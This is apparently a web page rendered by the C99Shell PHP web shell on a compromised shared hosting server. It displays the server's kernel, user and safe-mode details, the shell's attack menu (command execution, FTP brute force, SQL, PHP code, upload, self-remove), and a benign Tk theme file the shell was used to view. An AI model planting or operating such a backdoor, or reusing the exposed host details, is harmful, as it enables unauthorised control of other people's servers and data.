!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux web25.us.cloudlogin.co 5.10.237-xeon-hst #1 SMP Mon May 5 15:10:04 UTC 2025 x86_64 

uid=233359(alpastrology) gid=888(tty) groups=888(tty),33(tape) 

Safe-mode: OFF (not secure)

/usr/share/tk8.6/ttk/   drwxr-xr-x
Free 6181.9 GB of 6263.11 GB (98.7%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     winTheme.tcl (2.58 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#
# Settings for 'winnative' theme.
#

namespace eval ttk::theme::winnative {
    ttk::style theme settings winnative {

    ttk::style configure "." \
        -background SystemButtonFace \
        -foreground SystemWindowText \
        -selectforeground SystemHighlightText \
        -selectbackground SystemHighlight \
        -troughcolor SystemScrollbar \
        -font TkDefaultFont \
        ;

    ttk::style map "." -foreground [list disabled SystemGrayText] ;
        ttk::style map "." -embossed [list disabled 1] ;

    ttk::style configure TButton \
        -anchor center -width -11 -relief raised -shiftrelief 1
    ttk::style configure TCheckbutton -padding "2 4"
    ttk::style configure TRadiobutton -padding "2 4"
    ttk::style configure TMenubutton \
        -padding "8 4" -arrowsize 3 -relief raised

    ttk::style map TButton -relief {{!disabled pressed} sunken}

    ttk::style configure TEntry \
        -padding 2 -selectborderwidth 0 -insertwidth 1
    ttk::style map TEntry \
        -fieldbackground \
            [list readonly SystemButtonFace disabled SystemButtonFace] \
        -selectbackground [list !focus SystemWindow] \
        -selectforeground [list !focus SystemWindowText] \
        ;

    ttk::style configure TCombobox -padding 2
    ttk::style map TCombobox \
        -selectbackground [list !focus SystemWindow] \
        -selectforeground [list !focus SystemWindowText] \
        -fieldbackground [list \
            readonly SystemButtonFace \
        disabled SystemButtonFace] \
        -foreground    [list \
        disabled        SystemGrayText \
            {readonly focus}    SystemHighlightText \
        ] \
        -focusfill    [list {readonly focus} SystemHighlight] \
        ;

    ttk::style element create ComboboxPopdownFrame.border from default
    ttk::style configure ComboboxPopdownFrame \
        -borderwidth 1 -relief solid

        ttk::style configure TSpinbox -padding {2 0 16 0}

    ttk::style configure TLabelframe -borderwidth 2 -relief groove

    ttk::style configure Toolbutton -relief flat -padding {8 4}
    ttk::style map Toolbutton -relief \
        {disabled flat selected sunken  pressed sunken  active raised}

    ttk::style configure TScale -groovewidth 4

    ttk::style configure TNotebook -tabmargins {2 2 2 0}
    ttk::style configure TNotebook.Tab -padding {3 1} -borderwidth 1
    ttk::style map TNotebook.Tab -expand [list selected {2 2 2 0}]

    # Treeview:
    ttk::style configure Heading -font TkHeadingFont -relief raised
    ttk::style configure Treeview -background SystemWindow
    ttk::style map Treeview \
        -background [list selected SystemHighlight] \
        -foreground [list selected SystemHighlightText] ;

        ttk::style configure TProgressbar \
        -background SystemHighlight -borderwidth 0 ;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0135 ]--